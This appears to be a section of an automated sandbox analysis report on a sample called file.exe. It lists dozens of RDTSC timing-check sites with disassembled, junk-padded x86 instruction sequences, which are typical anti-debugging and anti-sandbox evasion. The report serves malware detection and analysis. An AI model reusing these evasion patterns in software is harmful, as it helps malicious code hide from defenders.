              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F487F second address: 7F489E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9298 second address: 7F929C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B794F second address: 7B7954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD530 second address: 7FD538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD538 second address: 7FD53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD53E second address: 7FD542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD542 second address: 7FD577 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007FE4C10F4F73h 0x00000014 jmp 00007FE4C10F4F6Fh 0x00000019 pop esi 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD577 second address: 7FD586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C120028Ah 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD586 second address: 7FD599 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C10F4F6Bh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD70F second address: 7FD71B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FE4C1200286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD85C second address: 7FD86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FE4C10F4F6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE307 second address: 7FE30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE5FA second address: 7FE62D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jnp 00007FE4C10F4F68h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE4C10F4F71h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE7D6 second address: 7FE7DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE7DC second address: 7FE7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FED22 second address: 7FED2C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FED2C second address: 7FED36 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4C10F4F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8012A2 second address: 8012A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8012A8 second address: 8012AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8012AC second address: 801322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jg 00007FE4C120028Ch 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D19F0h], esi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FE4C1200288h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D2851h], ebx 0x0000003e xchg eax, ebx 0x0000003f jmp 00007FE4C1200296h 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801322 second address: 801326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801CFF second address: 801D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C1200295h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B416D second address: 7B4177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4177 second address: 7B41C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE4C1200297h 0x0000000f jmp 00007FE4C120028Fh 0x00000014 jmp 00007FE4C120028Eh 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B41C7 second address: 7B41E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F77h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B41E4 second address: 7B41EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B41EA second address: 7B41EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8069EE second address: 8069F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8074CF second address: 807501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F79h 0x00000009 popad 0x0000000a push ebx 0x0000000b jo 00007FE4C10F4F66h 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 jbe 00007FE4C10F4F66h 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807501 second address: 807507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807CF0 second address: 807CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B081 second address: 80B0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE4C1200288h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov ebx, 0A255A04h 0x00000029 push 00000000h 0x0000002b jmp 00007FE4C120028Ch 0x00000030 push eax 0x00000031 jbe 00007FE4C12002ACh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE4C1200296h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0A7 second address: 80C0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D2A2 second address: 80D2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D2A6 second address: 80D2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E1FF second address: 80E220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FE4C120028Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E220 second address: 80E224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E224 second address: 80E2A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FE4C120028Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FE4C120028Ah 0x00000011 jo 00007FE4C1200291h 0x00000017 pushad 0x00000018 mov dword ptr [ebp+1247C9E0h], edx 0x0000001e adc dh, 0000000Ch 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov di, cx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FE4C1200288h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 jmp 00007FE4C1200297h 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FE4C120028Eh 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F1D8 second address: 80F1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d js 00007FE4C10F4F70h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E40E second address: 80E412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101DD second address: 8101E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101E1 second address: 8101E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F308 second address: 80F30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F30C second address: 80F325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE4C120028Fh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F325 second address: 80F32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811366 second address: 81139A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE4C1200292h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE4C1200299h 0x00000014 jmp 00007FE4C1200293h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814420 second address: 814438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C10F4F74h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81548A second address: 81548E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81548E second address: 815494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8146A6 second address: 8146AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816606 second address: 81660A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8156B0 second address: 8156D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE4C1200299h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81660A second address: 8166A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FE4C10F4F74h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FE4C10F4F68h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+122D2CD8h], ecx 0x0000002f pop ebx 0x00000030 jmp 00007FE4C10F4F6Ch 0x00000035 push 00000000h 0x00000037 jc 00007FE4C10F4F6Bh 0x0000003d and di, 06CEh 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FE4C10F4F68h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D36B8h], edi 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jnl 00007FE4C10F4F75h 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8156D5 second address: 8156D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8166A5 second address: 8166AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8166AA second address: 8166B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8166B6 second address: 8166C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8174FB second address: 81756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007FE4C120028Ch 0x0000000b jg 00007FE4C1200286h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push edx 0x00000016 ja 00007FE4C1200286h 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FE4C1200288h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 jnc 00007FE4C1200287h 0x0000003f push 00000000h 0x00000041 jns 00007FE4C1200294h 0x00000047 jmp 00007FE4C120028Ah 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81756C second address: 817573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817573 second address: 81758D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C1200296h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81758D second address: 8175A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175A6 second address: 8175AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175AA second address: 8175B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE4C10F4F66h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175B8 second address: 8175BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8184F4 second address: 8184F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819414 second address: 819422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819422 second address: 819427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81870E second address: 818713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819427 second address: 81942C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81942C second address: 81948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FE4C1200288h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 and edi, dword ptr [ebp+122D2E16h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FE4C1200288h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov bx, dx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81948C second address: 819491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819491 second address: 819497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819497 second address: 81949B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81949B second address: 81949F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CA4A second address: 81CA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CA4E second address: 81CA58 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CA58 second address: 81CA87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE4C10F4F76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F858 second address: 81F86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FE4C120028Bh 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F86C second address: 81F871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823A47 second address: 823A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8234C7 second address: 8234CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5D22 second address: 7B5D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8293DB second address: 8293F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FE4C10F4F66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f js 00007FE4C10F4F70h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8293F3 second address: 829422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jno 00007FE4C120029Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FE4C1200286h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829422 second address: 829439 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jo 00007FE4C10F4F66h 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E9C7 second address: 82E9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E9CB second address: 82E9D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE4C10F4F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D49 second address: 7C6D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6E6 second address: 82D6F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6F0 second address: 82D6F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6F4 second address: 82D6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
